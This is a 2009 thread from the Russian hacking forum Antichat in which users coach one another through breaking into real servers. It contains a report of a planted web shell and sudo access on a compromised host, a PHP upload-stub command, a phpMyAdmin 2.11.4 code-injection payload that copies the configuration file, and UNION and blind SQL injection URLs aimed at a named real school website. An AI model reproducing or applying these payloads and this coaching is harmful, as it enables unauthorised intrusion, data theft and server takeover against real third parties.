Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

24.11.2009, 17:01
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Посмотри есть ли сама качалка
which wget; which curl; which lynx; which links; which fetch
Код:
which which wget curl lynx links fetch
|
|
|

24.11.2009, 17:03
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме: 7144817
Репутация:
1503
|
|
Сообщение от mailbrush
Код:
which which wget curl lynx links fetch
да, спасибо, мне стало лучше, особенно
__________________
You may say I'm a dreamer
But I'm not the only one
|
|
|

24.11.2009, 17:05
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
да, спасибо, мне стало лучше, особенно
Это чтобы проверить есть ли which, если ты не понял =\
|
|
|

24.11.2009, 17:09
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме: 7144817
Репутация:
1503
|
|
Сообщение от mailbrush
Это чтобы проверить есть ли which, если ты не понял =\
А which тебе что покажет, если его нет? 
т.е. результат which which и which curl будет разный, если самого which нету? =\
З.Ы. Модеры, сорри
__________________
You may say I'm a dreamer
But I'm not the only one
|
|
|

24.11.2009, 17:16
|
|
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме: 143706
Репутация:
-1
|
|
Хм..попробовал:
echo "copy($_FILES['filename']['tmp_name'], '/var/www/htdocs/write/9.php')" > /var/www/htdocs/write/9.php
Чет не канает...
Кстати,sudo команда доступна...Забыл добавить,что админка - Там ещё фильтруются двойные кавычки,посему пришлось извращаться через селект и лить свой убогий шелл).Оттуда и выполняю команды теперь.
Последний раз редактировалось GenTao; 24.11.2009 в 17:20..
|
|
|

24.11.2009, 17:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме: 7144817
Репутация:
1503
|
|
Сообщение от GenTao
Хм..попробовал:
echo "copy($_FILES['filename']['tmp_name'], '/var/www/htdocs/write/9.php')" > /var/www/htdocs/write/9.php
Чет не канает...
А <? ... ?> кто напишет?
И что именно не канает? это расплывчатое понятие.
1) не загружается файл (естественно, в файле не скрипт а белиберда)
2) не пишется в сам файл
3) не могу форму сделать для загрузки файла
4) написал чушь, 9.php')" > /var/www/htdocs/write/9.php
__________________
You may say I'm a dreamer
But I'm not the only one
|
|
|

24.11.2009, 18:14
|
|
Познающий
Регистрация: 01.12.2008
Сообщений: 68
Провел на форуме: 484662
Репутация:
143
|
|
PhpmyAdmin 2.11.4
Есть Windows сервер с XAMPP (MySQL 5.03, phpMyAdmin 2.11.4).
Уязвимых скриптов не нашел, страницы - полуголая статика. Обратил внимание на пхпМайАдмин, порылся на ачате - нашел уязвимость, нормального описания ее найти не смог, как использовать тоже.
Кто может объяснить более подробно как использовать уязвимость или дать ссылку, где можно почитать.
P.S. я про server_databases.php?pos=0&dbstats=0&sort_ by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]
|
|
|

24.11.2009, 18:46
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме: 2200171
Репутация:
270
|
|
тебе нужен валидный токен,т.е надо валидный логин пасс на пхп админ.
порты проскань,можешь найдешь что нить
|
|
|

24.11.2009, 20:56
|
|
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме: 143706
Репутация:
-1
|
|
_http://www.astangukool.edu.ee/rus/poll/db/comments.php?action=send&id=2+union+select+1--&template_set=default
Чет не хочет крутиться дальше ).вывода нету,ascii тож не заюзать...
|
|
|

24.11.2009, 21:06
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
мор1ров заюзай
http://www.astangukool.edu.ee/rus/poll/db/comments.php?action=send&id=2+and+if(substring(ver sion(),1,1)=5,1,(select+1+union+select+2))
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|